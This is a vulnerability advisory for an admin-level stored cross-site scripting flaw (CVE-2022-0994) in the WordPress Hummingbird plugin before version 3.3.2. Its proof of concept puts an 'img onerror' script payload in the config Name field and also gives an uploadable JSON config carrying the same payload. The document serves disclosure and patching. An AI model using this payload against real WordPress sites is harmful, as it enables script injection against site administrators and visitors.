WordPress Hummingbird Cross Site Scripting

WordPress Hummingbird plugin versions prior to 3.3.2 suffers from a persistent cross site scripting vulnerability.


MD5 | 9e53f7f26629cb6869e967753b4b4851

Tittle:
WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

References:
CVE-2022-0994

Author:
Taurus Omar

Description:
The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Affects Plugins:
Hummingbird-performance - Fixed in version 3.3.2

Proof of Concept:
Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config

{
"id": 1,
"name": "<img src onerror=alert(/XSS/)>",
"description": "Xss",
"config": {
"configs": {
"settings": {
"advanced": {
"query_string": false,
"emoji": false,
"cart_fragments": false,
"lazy_load": {
"enabled": false
}
},
"database": {
"reports": {
"enabled": false
}
},
"gravatar": {
"enabled": true
},
"page_cache": {
"enabled": true,
"detection": "auto",
"integrations": {
"varnish": false,
"opcache": false
},
"preload": false
},
"performance": [],
"rss": {
"enabled": true,
"duration": 3600
},
"settings": {
"accessible_colors": false,
"remove_settings": false,
"remove_data": false,
"control": true
},
"uptime": {
"enabled": false
}
}
},
"strings": {
"advanced": [
"Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
],
"database": [
""
],
"gravatar": [
"Gravatar cache - Active\n"
],
"page_cache": [
"Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
],
"rss": [
"RSS caching - Active\n"
],
"settings": [
"High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
],
"uptime": [

"Uptime - Inactive\n"
]
}
},

"plugin": "1081721"
}

Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a


Related Posts